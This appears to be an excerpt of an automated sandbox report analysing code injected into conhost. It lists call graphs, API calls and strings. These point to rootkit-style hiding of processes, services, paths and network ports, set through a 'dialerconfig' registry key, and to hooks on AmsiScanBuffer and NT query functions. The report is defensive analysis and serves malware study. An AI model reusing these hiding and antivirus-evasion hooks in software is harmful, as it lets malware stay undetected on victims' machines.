StrCmpIW StrCmpW 8554->8555 8556 1d29e8c3c74 StrCmpNIW 8554->8556 8555->8554 8556->8554 8557 1d29e8c4010 8559 1d29e8c3f5d 8557->8559 8558 1d29e8c3fad VirtualQuery 8558->8559 8560 1d29e8c3fc7 8558->8560 8559->8558 8559->8560 8561 1d29e8c4012 GetLastError 8559->8561 8561->8559 8561->8560 8133 1d29e8d4e90 8143 1d29e8c9418 8133->8143 8135 1d29e8d4eb8 8137 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8138 1d29e8d4ec8 8137->8138 8139 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8138->8139 8140 1d29e8d4ed1 8139->8140 8147 1d29e8ccad8 8140->8147 8146 1d29e8c9448 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8143->8146 8144 1d29e8c9539 8144->8135 8144->8137 8145 1d29e8c9504 RtlUnwindEx 8145->8146 8146->8144 8146->8145 8148 1d29e8cd258 _invalid_parameter_noinfo 23 API calls 8147->8148 8149 1d29e8ccae1 8148->8149 8562 1d29e8d4e10 8563 1d29e8d4e48 __GSHandlerCheckCommon 8562->8563 8564 1d29e8d4e74 8563->8564 8566 1d29e8ca16c 8563->8566 8567 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8566->8567 8568 1d29e8ca196 8567->8568 8569 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8568->8569 8570 1d29e8ca1a3 8569->8570 8571 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8570->8571 8572 1d29e8ca1ac 8571->8572 8572->8564 9398 1d29e8c7f0c 9405 1d29e8c968c 9398->9405 9401 1d29e8c7f19 9406 1d29e8c9a80 __CxxCallCatchBlock 9 API calls 9405->9406 9407 1d29e8c7f15 9406->9407 9407->9401 9408 1d29e8cca6c 9407->9408 9409 1d29e8cd3d0 __free_lconv_mon 11 API calls 9408->9409 9410 1d29e8c7f22 9409->9410 9410->9401 9411 1d29e8c96a0 9410->9411 9414 1d29e8c9a1c 9411->9414 9413 1d29e8c96a9 9413->9401 9415 1d29e8c9a42 __vcrt_freefls 9414->9415 9416 1d29e8c9a2d 9414->9416 9415->9413 9417 1d29e8ca3d4 __CxxCallCatchBlock 6 API calls 9416->9417 9418 1d29e8c9a32 9417->9418 9420 1d29e8ca41c 9418->9420 9421 1d29e8ca1f4 __vcrt_InitializeCriticalSectionEx 5 API calls 9420->9421 9422 1d29e8ca44a 9421->9422 9423 1d29e8ca45c TlsSetValue 9422->9423 9424 1d29e8ca454 9422->9424 9423->9424 9424->9415 9015 1d29e8c8386 9016 1d29e8c9818 __std_exception_copy 49 API calls 9015->9016 9017 1d29e8c83b1 9016->9017 8573 1d29e8d5208 8576 1d29e8cb630 8573->8576 8577 1d29e8cb64f 8576->8577 8579 1d29e8cb6a0 8576->8579 8578 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8577->8578 8577->8579 8578->8579 8580 1d29e8c2604 8581 1d29e8c2683 8580->8581 8582 1d29e8c26e5 GetFileType 8581->8582 8592 1d29e8c2872 8581->8592 8583 1d29e8c2709 8582->8583 8584 1d29e8c26f3 StrCpyW 8582->8584 8586 1d29e8c19d8 4 API calls 8583->8586 8585 1d29e8c2718 8584->8585 8587 1d29e8c27c7 8585->8587 8590 1d29e8c2722 8585->8590 8586->8585 8589 1d29e8c3c74 StrCmpNIW 8587->8589 8587->8592 8594 1d29e8c330c 4 API calls 8587->8594 8595 1d29e8c1cd8 2 API calls 8587->8595 8588 1d29e8c3c74 StrCmpNIW 8588->8590 8589->8587 8590->8588 8591 1d29e8c330c 4 API calls 8590->8591 8590->8592 8593 1d29e8c1cd8 2 API calls 8590->8593 8591->8590 8593->8590 8594->8587 8595->8587 8150 1d29e8cf484 GetCommandLineA GetCommandLineW 9018 1d29e8ccd84 9019 1d29e8ccd8c 9018->9019 9021 1d29e8ccdbd 9019->9021 9023 1d29e8ccdb9 9019->9023 9024 1d29e8cfa3c 9019->9024 9029 1d29e8ccde8 9021->9029 9025 1d29e8cf7c4 5 API calls 9024->9025 9026 1d29e8cfa72 9025->9026 9027 1d29e8cfa91 InitializeCriticalSectionAndSpinCount 9026->9027 9028 1d29e8cfa77 9026->9028 9027->9028 9028->9019 9030 1d29e8cce13 9029->9030 9031 1d29e8cce17 9030->9031 9032 1d29e8ccdf6 DeleteCriticalSection 9030->9032 9031->9023 9032->9030

                                                          Executed Functions

                                                          Function 000001D29E8C3620 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 000001D29E8C3639
                                                          • PathFindFileNameW.SHLWAPI ref: 000001D29E8C3648
                                                            • Part of subcall function 000001D29E8C3C74: StrCmpNIW.SHLWAPI(?,?,?,000001D29E8C254B), ref: 000001D29E8C3C8C
                                                            • Part of subcall function 000001D29E8C3BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001D29E8C365F), ref: 000001D29E8C3BCE
                                                            • Part of subcall function 000001D29E8C3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001D29E8C365F), ref: 000001D29E8C3BFC
                                                            • Part of subcall function 000001D29E8C3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001D29E8C365F), ref: 000001D29E8C3C1E
                                                            • Part of subcall function 000001D29E8C3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001D29E8C365F), ref: 000001D29E8C3C39
                                                            • Part of subcall function 000001D29E8C3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001D29E8C365F), ref: 000001D29E8C3C5A
                                                          • CreateThread.KERNELBASE ref: 000001D29E8C368F
                                                            • Part of subcall function 000001D29E8C1D40: GetCurrentThread.KERNEL32 ref: 000001D29E8C1D4B
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0
                                                          • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction ID: 1683000f9dc4dd73dd4d2b2071180caecfc822b5b41e0ca1ca8a1718047fff01
                                                          • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction Fuzzy Hash: 8C11927061362582FB6CABE0A436BDE2390BB7630DF40416BD576412B7DF7CC04AAA00
                                                          Function 000001D29E892AC0 Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction ID: 3c6c80d7e471872b52585788e7528b6a28de4e8c0383d2190911ffd9fcedb16e
                                                          • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction Fuzzy Hash: 6D913772B0256087EB6CCF65E058BAD7391F778BACF548126DE3A07799DA38D812C740
                                                          Function 000001D29E8C1AC8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 000001D29E8C1628: GetProcessHeap.KERNEL32 ref: 000001D29E8C1633
                                                            • Part of subcall function 000001D29E8C1628: HeapAlloc.KERNEL32 ref: 000001D29E8C1642
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C16B2
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C16DF
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C16F9
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C1719
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C1734
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C1754
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C176F
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C178F
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C17AA
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C17CA
                                                          • SleepEx.KERNELBASE ref: 000001D29E8C1AE3
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C17E5
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C1805
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C1820
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C1840
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C185B
                                                            • Part of subcall function 000001D29E8C1628: RegOpenKeyExW.ADVAPI32 ref: 000001D29E8C187B
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C1896
                                                            • Part of subcall function 000001D29E8C1628: RegCloseKey.ADVAPI32 ref: 000001D29E8C18A0
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction ID: 06bbfc522ada3b26fdb0d2dcff6431a596baa06a08803a463e175598942553bf
                                                          • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction Fuzzy Hash: EA312F7160362542EB58ABA2D9F13EA53B4BBA9BD8F045023DF39876B5EF30C8518600

                                                          Non-executed Functions

                                                          Function 000001D29E8C2BF4 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 205 1d29e8c2bf4-1d29e8c2c6d 207 1d29e8c2f88-1d29e8c2fab 205->207 208 1d29e8c2c73-1d29e8c2c79 205->208 208->207 209 1d29e8c2c7f-1d29e8c2c82 208->209 209->207 210 1d29e8c2c88-1d29e8c2c8b 209->210 210->207 211 1d29e8c2c91-1d29e8c2ca1 GetModuleHandleA 210->211 212 1d29e8c2ca3-1d29e8c2cb3 GetProcAddress 211->212 213 1d29e8c2cb5 211->213 214 1d29e8c2cb8-1d29e8c2cd6 212->214 213->214 214->207 216 1d29e8c2cdc-1d29e8c2cfb StrCmpNIW 214->216 216->207 217 1d29e8c2d01-1d29e8c2d05 216->217 217->207 218 1d29e8c2d0b-1d29e8c2d15 217->218 218->207 219 1d29e8c2d1b-1d29e8c2d22 218->219 219->207 220 1d29e8c2d28-1d29e8c2d3b 219->220 221 1d29e8c2d4b 220->221 222 1d29e8c2d3d-1d29e8c2d49 220->222 223 1d29e8c2d4e-1d29e8c2d52 221->223 222->223 224 1d29e8c2d62 223->224 225 1d29e8c2d54-1d29e8c2d60 223->225 226 1d29e8c2d65-1d29e8c2d6f 224->226 225->226 227 1d29e8c2e55-1d29e8c2e59 226->227 228 1d29e8c2d75-1d29e8c2d78 226->228 229 1d29e8c2e5f-1d29e8c2e62 227->229 230 1d29e8c2f7a-1d29e8c2f82 227->230 231 1d29e8c2d8a-1d29e8c2d94 228->231 232 1d29e8c2d7a-1d29e8c2d87 call 1d29e8c1934 228->232 233 1d29e8c2e73-1d29e8c2e7d 229->233 234 1d29e8c2e64-1d29e8c2e70 call 1d29e8c1934 229->234 230->207 230->220 236 1d29e8c2d96-1d29e8c2da3 231->236 237 1d29e8c2dc8-1d29e8c2dd2 231->237 232->231 241 1d29e8c2e7f-1d29e8c2e8c 233->241 242 1d29e8c2ead-1d29e8c2eb0 233->242 234->233 236->237 244 1d29e8c2da5-1d29e8c2db2 236->244 238 1d29e8c2e02-1d29e8c2e05 237->238 239 1d29e8c2dd4-1d29e8c2de1 237->239 247 1d29e8c2e07-1d29e8c2e11 call 1d29e8c1bc8 238->247 248 1d29e8c2e13-1d29e8c2e20 lstrlenW 238->248 239->238 245 1d29e8c2de3-1d29e8c2df0 239->245 241->242 249 1d29e8c2e8e-1d29e8c2e9b 241->249 250 1d29e8c2ebd-1d29e8c2eca lstrlenW 242->250 251 1d29e8c2eb2-1d29e8c2ebb call 1d29e8c1bc8 242->251 252 1d29e8c2db5-1d29e8c2dbb 244->252 253 1d29e8c2df3-1d29e8c2df9 245->253 247->248 260 1d29e8c2e4b-1d29e8c2e50 247->260 256 1d29e8c2e22-1d29e8c2e31 call 1d29e8c1c00 248->256 257 1d29e8c2e33-1d29e8c2e45 call 1d29e8c3c74 248->257 255 1d29e8c2e9e-1d29e8c2ea4 249->255 261 1d29e8c2ecc-1d29e8c2edb call 1d29e8c1c00 250->261 262 1d29e8c2edd-1d29e8c2ee7 call 1d29e8c3c74 250->262 251->250 269 1d29e8c2ef2-1d29e8c2efd 251->269 259 1d29e8c2dc1-1d29e8c2dc6 252->259 252->260 253->260 265 1d29e8c2dfb-1d29e8c2e00 253->265 268 1d29e8c2ea6-1d29e8c2eab 255->268 255->269 256->257 256->260 257->260 263 1d29e8c2eea-1d29e8c2eec 257->263 259->237 259->252 260->263 261->262 261->269 262->263 263->230 263->269 265->238 265->253 268->242 268->255 275 1d29e8c2eff-1d29e8c2f03 269->275 276 1d29e8c2f74-1d29e8c2f78 269->276 279 1d29e8c2f0b-1d29e8c2f25 call 1d29e8c89f0 275->279 280 1d29e8c2f05-1d29e8c2f09 275->280 276->230 281 1d29e8c2f28-1d29e8c2f2b 279->281 280->279 280->281 284 1d29e8c2f4e-1d29e8c2f51 281->284 285 1d29e8c2f2d-1d29e8c2f4b call 1d29e8c89f0 281->285 284->276 286 1d29e8c2f53-1d29e8c2f71 call 1d29e8c89f0 284->286 285->284 286->276
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction ID: 1580a5fc35f9f3768bf1c873e8b5578b712228ca5f7f96f0f96ac0613b562586
                                                          • Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction Fuzzy Hash: 97B17F72213E6881EB6D9FA5D4607D963A4FB6AB88F445017EE39537E5DB34CC80C340
                                                          Function 000001D29E8C81C0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction ID: 43867f5447f61fa8aeb849ae292d6fda23fdc926b732fdf74d2c93b3d2b02cdd
                                                          • Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction Fuzzy Hash: 7D316672206B90DAEB649FA0E8603ED7374FB55748F44442BDA6E47BA8DF38C549C710
                                                          Function 000001D29E8CD6D4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction ID: 883d46e61a5da8a681544cdf0bad746b4b555d7c845fd75ad5ddb1e8eb3cd374
                                                          • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction Fuzzy Hash: 0B316272216F9086DB64DF65E8503DE73A4FB99758F500116EABD43BA8DF38C185CB00
                                                          Function 000001D29E8C7D90 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                          • Instruction ID: 399d590cb5a3225f575dce46190a1f560c044400ed79aa120d1af8336c17da06
                                                          • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                          • Instruction Fuzzy Hash: 55113C32711F148AEF00DFA0E8643E833A4FB29758F440E26DA7D467A4DF78C2988380
                                                          Function 000001D29E8CE110 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 223b01cd0f930ae752de15cad39410bfb9f0e3b9a5322d2e97186d94b51f497c
                                                          • Instruction ID: 8e83546f846ffe4391c5812cb3cee53622180969079137a32ad33a7652933ac8
                                                          • Opcode Fuzzy Hash: 223b01cd0f930ae752de15cad39410bfb9f0e3b9a5322d2e97186d94b51f497c
                                                          • Instruction Fuzzy Hash: F551D332702AA089FB24DBB2A8507EE7BA1F751798F144116EE7827FA9DB38C001C700
                                                          Function 000001D29E8A3B20 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cae390c6a42f7aa34880c2341c4c444ed621bc792ca3f489e9df2915f57af0cb
                                                          • Instruction ID: e9235f85d6ffaedf5d4777f7bfaa1df89cb1648e988c0adf185c11685169c2d1
                                                          • Opcode Fuzzy Hash: cae390c6a42f7aa34880c2341c4c444ed621bc792ca3f489e9df2915f57af0cb
                                                          • Instruction Fuzzy Hash: 52F06271B162A48EDBA88F68B81275A77E1F318384FD4805ED6A983B24D23C8061CF04
                                                          Function 000001D29E8C1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-2879589442
                                                          • Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                          • Instruction ID: a227a7f36c8297d69906a4fdadc401eccae57495ff3980576ccd485e5d573718
                                                          • Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                          • Instruction Fuzzy Hash: 4A71D776312A2486EB149FA5E8A0BDD23B4FFA5B8CF405112DA6E57B79DE38C484C740
                                                          Function 000001D29E8C1D40 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 000001D29E8C1D4B
                                                            • Part of subcall function 000001D29E8C20C4: GetModuleHandleA.KERNEL32(?,?,?,000001D29E8C1D7D), ref: 000001D29E8C20DC
                                                            • Part of subcall function 000001D29E8C20C4: GetProcAddress.KERNEL32(?,?,?,000001D29E8C1D7D), ref: 000001D29E8C20ED
                                                            • Part of subcall function 000001D29E8C5F60: GetCurrentThreadId.KERNEL32 ref: 000001D29E8C5F9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 4175298099-4225371247
                                                          • Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                          • Instruction ID: 8b7f6b2a4df231c9bde63ee3d6ffd789226de77c7eed645b663af9635eea49ec
                                                          • Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
